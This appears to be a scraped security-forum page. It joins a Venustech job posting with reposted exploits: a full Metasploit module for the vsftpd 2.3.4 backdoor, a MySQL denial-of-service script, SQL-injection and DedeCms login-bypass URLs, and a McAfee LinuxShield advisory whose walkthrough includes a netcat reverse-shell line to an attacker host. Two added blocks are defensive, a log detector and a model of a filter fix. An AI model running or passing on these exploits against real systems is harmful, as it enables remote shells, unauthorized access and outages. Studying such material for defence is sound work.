
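[Recruitment] [Hiring] Venustech (启明星辰) R&D Recruitment

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ:
  • Security assistant: Recruiting/job hunting through the 非安全中国 administrators, QQ group: 57116771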


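  • ++++++++++ Notes on Venustech ++++++++++

    Just send me an in-site message.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Development and maintenance of software for embedded devices such as security gateways, firewalls, and IPS

    Requirements:

    1. Proficient in C programming

    2. Skilled with the Linux operating system; proficient in C programming on Linux

    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis

    4. Familiar with network security protocols and with routers, switches, firewalls, and other security devices

    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. Responsible for system testing and integration testing of products

    2. Responsible for writing, executing, and revising product test cases

    3. Responsible for product performance testing

    4. Responsible for support and testing work on external projects

    Requirements:

    1. Basic TCP/IP knowledge

    2. Solid data-communications fundamentals

    3. Some grounding in Linux

    4. Able to set up and use databases

    5. Familiar with at least one programming language: C/Perl/VBS/TCL

    6. Familiar with test case design, system testing, and stress testing

    7. Familiar with firewall principles, with some understanding of firewall features

    8. Some understanding of how network security devices are deployed in a network

    9. Able to use test tools: Loadrunner, packet analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivering trojan detection services and web vulnerability scanning services

    2. Technical support for service customers

    3. Research on web trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows, etc.

    4. Routine upgrade and maintenance of the security event libraries for IDS/IPS/UTM/TDS/WAG/322 and other products

    5. Research on attack techniques; research on the TCP/IP protocol; research on reverse engineering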


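    非安全中国网 disclaimer: 1. All statements and images in this post are solely the personal opinion of the poster and do not represent the position of this site;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer Statement" and enjoys the related rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting, or quoting this post;
    4. Parts of this post are reposted from other media and published on this site in order to convey more information; this does not mean that the site endorses the views expressed or vouches for their accuracy;
    5. If this post infringes the copyright of your site or of any individual, please notify this site immediately; it will be removed promptly, with our sincerest apologies;
    6. The site's administrators and moderators have the right to delete this post without notifying the poster in advance.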

    VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        # Check whether the backdoor listener on port 6200 is already open
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end

    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.

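Added example (not part of the original post or of the Metasploit module): the module above sends a USER name ending in ":)" and then connects to TCP port 6200, so both events are worth alerting on, together and separately. The log format, field layout, correlation window and sample lines below are constructed for illustration.

```python
from datetime import datetime, timedelta

BACKDOOR_PORT = 6200             # bind-shell port the module on this page connects to
TRIGGER_SUFFIX = ":)"            # suffix the module appends to its random USER name
WINDOW = timedelta(seconds=60)   # correlation window (assumption, tune per site)

# Constructed sample events in a hypothetical, simplified format:
#   <ISO time> FTP  <client ip> <FTP command line>
#   <ISO time> CONN <client ip> <server port>
SAMPLE_LOG = """\
2011-07-04T10:00:01 FTP 198.51.100.7 USER alice
2011-07-04T10:00:02 FTP 198.51.100.7 PASS ****
2011-07-04T10:05:10 FTP 203.0.113.9 USER x7Qa:)
2011-07-04T10:05:10 FTP 203.0.113.9 PASS ****
2011-07-04T10:05:11 CONN 203.0.113.9 6200
2011-07-04T10:09:00 FTP 192.0.2.44 USER bob:)
2011-07-04T10:20:00 CONN 192.0.2.44 6200
2011-07-04T10:30:00 CONN 198.51.100.7 6200
"""


def detect(log_text):
    """Return (client_ip, finding, timestamp) tuples in log order."""
    last_trigger = {}   # client ip -> time of its latest trigger-style USER
    findings = []
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) != 4:
            continue                      # skip blank or malformed lines
        ts = datetime.fromisoformat(parts[0])
        kind, ip, rest = parts[1], parts[2], parts[3]
        if kind == "FTP":
            verb, _, arg = rest.partition(" ")
            if verb.upper() == "USER" and arg.rstrip().endswith(TRIGGER_SUFFIX):
                last_trigger[ip] = ts
                findings.append((ip, "trigger-username", ts))
        elif kind == "CONN" and rest.strip() == str(BACKDOOR_PORT):
            seen = last_trigger.get(ip)
            if seen is not None and ts - seen <= WINDOW:
                # Same client sent the trigger shortly before: highest priority.
                findings.append((ip, "backdoor-port-after-trigger", ts))
            else:
                # The module also probes 6200 before any FTP login, so a lone
                # connection to that port is still worth a look.
                findings.append((ip, "backdoor-port-only", ts))
    return findings


if __name__ == "__main__":
    for ip, finding, ts in detect(SAMPLE_LOG):
        print(ts.isoformat(), ip, finding)
```

A legitimate account name could end in ":)", so the username finding alone is a lead; the correlated finding is the one to page on.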

    WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/

    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429


    MySQL 5.5.8 Remote Denial of Service Vulnerability

    import socket, sys

    print("\n")
    print("----------------------------------------------------------------")
    print("| MySQL 5.5.8 Null Ptr (windows)                                |")
    print("| Level Smash the Stack                                         |")
    print("----------------------------------------------------------------")
    print("\n")

    # Client login packet (user "root")
    buf = (b"&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
           b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    # Query packet sent after the login packet
    buf2 = (b"\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print("usage : ./mysql.py <victim_ip>")
        print("example: ./mysql.py 192.168.1.22")


    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST, PORT))
        print("[*] Connect")
        s.send(buf)
        print("[*] Payload 1 sent")
        s.send(buf2)
        print("[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n")
        s.close()

    if __name__ == "__main__":
        main()


    Step-by-Step Linux Installation: Setting Up the Virtual Machine

    http://www.sitedir.com.cn/video/4.swf


    DedeCms (织梦) v5.6-5.7 Unauthorized Access Vulnerability

    http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug in the URL above to the current CAPTCHA code and you go straight into the site's admin back end.

    This vulnerability can only be exploited if the admin path is known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);

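Added example, not DedeCms code: a Python model of the two PHP checks in the post above, showing that the original top-level loop never sees the nested key in _POST[GLOBALS][cfg_dbhost] while the recursive CheckRequest does. The query-string parser is a simplified stand-in for how PHP builds nested request arrays, and the sample requests and host name are constructed.

```python
import re
from urllib.parse import parse_qsl

# Same pattern as both PHP checks: names starting with cfg_ or GLOBALS.
BLOCKED = re.compile(r"^(cfg_|GLOBALS)")
KEY_SHAPE = re.compile(r"^([^\[]+)((?:\[[^\]]*\])*)$")


def php_style_params(query):
    """Build nested dicts from a[b][c]=v keys, roughly as PHP fills $_REQUEST.

    Simplified model (assumption): empty brackets and PHP's key-mangling
    rules are not reproduced.
    """
    root = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        m = KEY_SHAPE.match(raw_key)
        if m is None:
            path = [raw_key]
        else:
            path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = root
        for part in path[:-1]:
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        node[path[-1]] = value
    return root


def old_check_blocks(params):
    """Original loop: only the top-level request keys are tested."""
    return any(len(k) > 0 and BLOCKED.match(k) is not None for k in params)


def new_check_blocks(val):
    """Replacement CheckRequest(): recurse into arrays, test keys and values."""
    if isinstance(val, dict):
        return any(new_check_blocks(k) or new_check_blocks(v)
                   for k, v in val.items())
    text = str(val)
    return len(text) > 0 and BLOCKED.match(text) is not None


def compare(query):
    """Return (blocked_by_old_check, blocked_by_new_check) for one request."""
    params = php_style_params(query)
    return old_check_blocks(params), new_check_blocks(params)


# Constructed sample requests (placeholder host and values).
SAMPLES = {
    "benign": "dopost=login&userid=editor",
    "direct": "cfg_dbhost=db.example.test",
    "nested": "dopost=login&_POST[GLOBALS][cfg_dbhost]=db.example.test",
    "value": "keyword=cfg_basehost",
}

if __name__ == "__main__":
    for name, query in SAMPLES.items():
        print(name, compare(query))
```

The "value" sample shows a side effect of the replacement: because it tests values as well as keys, ordinary input that merely begins with cfg_ or GLOBALS is rejected too.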

    Step-by-Step Linux Installation: Setting Up the Virtual Machine Tools

    http://www.sitedir.com.cn/video/8.swf


    Multiple Security Vulnerabilities in the Django Framework

    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks, or cause denial of service.
    1) An error in session handling in django.contrib.sessions when a cache backend is used can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) Django's model system includes a field type, URLField, that checks whether the supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify and resolve the supplied URL. By default the underlying socket has no timeout set, and an attacker can exploit this by sending a specially crafted URL to consume all server memory, causing denial of service.
    3) An error in handling redirect responses when validating URLs supplied to the "URLField" field type lets an attacker return a redirect response pointing to a "file://" URL, which can be used to determine whether local files exist on the server.
    4) An error in handling the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses lets an attacker carry out cache poisoning attacks.

    Details:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/


    McAfee LinuxShield Local/Remote Code Execution Vulnerability

    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local overflow: Yes

    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-based
    systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1
              siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists
              xmlns:ns="naSiteList" GlobalVersion="20030131003110"
              LocalVersion="20091209161903" Type="Client"><SiteList
              Default="1" Name="SomeGUID"><HttpSite Type="repository"
              Name="EvilRepo" Order="1" Server="<attackerhost>:80"
              Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password
              Encrypted="0"/></HttpSite></SiteList></ns:SiteLists>
              _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888
              nailsd.profile.ODS_99.allFiles=true
              nailsd.profile.ODS_99.childInitTmo=60
              nailsd.profile.ODS_99.cleanChildren=2
              nailsd.profile.ODS_99.cleansPerChild=10000
              nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat
              nailsd.profile.ODS_99.decompArchive=true
              nailsd.profile.ODS_99.decompExe=true
              nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib
              nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
              nailsd.profile.ODS_99.factoryInitTmo=60
              nailsd.profile.ODS_99.heuristicAnalysis=true
              nailsd.profile.ODS_99.macroAnalysis=true
              nailsd.profile.ODS_99.maxQueSize=32
              nailsd.profile.ODS_99.mime=true
              nailsd.profile.ODS_99.noJokes=false
              nailsd.profile.ODS_99.program=true
              nailsd.profile.ODS_99.quarantineChildren=1
              nailsd.profile.ODS_99.quarantineDirectory=/quarantine
              nailsd.profile.ODS_99.quarantinesPerChild=10000
              nailsd.profile.ODS_99.scanChildren=2
              nailsd.profile.ODS_99.scanMaxTmo=301
              nailsd.profile.ODS_99.scanNWFiles=true
              nailsd.profile.ODS_99.scanOnRead=true
              nailsd.profile.ODS_99.scanOnWrite=true
              nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
              nailsd.profile.ODS_99.scansPerChild=10000
              nailsd.profile.ODS_99.slowScanChildren=0
              nailsd.profile.ODS_99.filter.0.type=exclude-path
              nailsd.profile.ODS_99.filter.0.path=/proc
              nailsd.profile.ODS_99.filter.0.subdir=true
              nailsd.profile.ODS_99.filter.extensions.mode=all
              nailsd.profile.ODS_99.filter.extensions.type=extension
              nailsd.profile.ODS_99.action.Default.primary=Clean
              nailsd.profile.ODS_99.action.Default.secondary=Quarantine
              nailsd.profile.ODS_99.action.App.primary=Clean
              nailsd.profile.ODS_99.action.App.secondary=Quarantine
              nailsd.profile.ODS_99.action.timeout=Pass
              nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task
              taskType=On-Demand
              taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false
              timetable=type=unscheduled taskResults=0
              i_lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
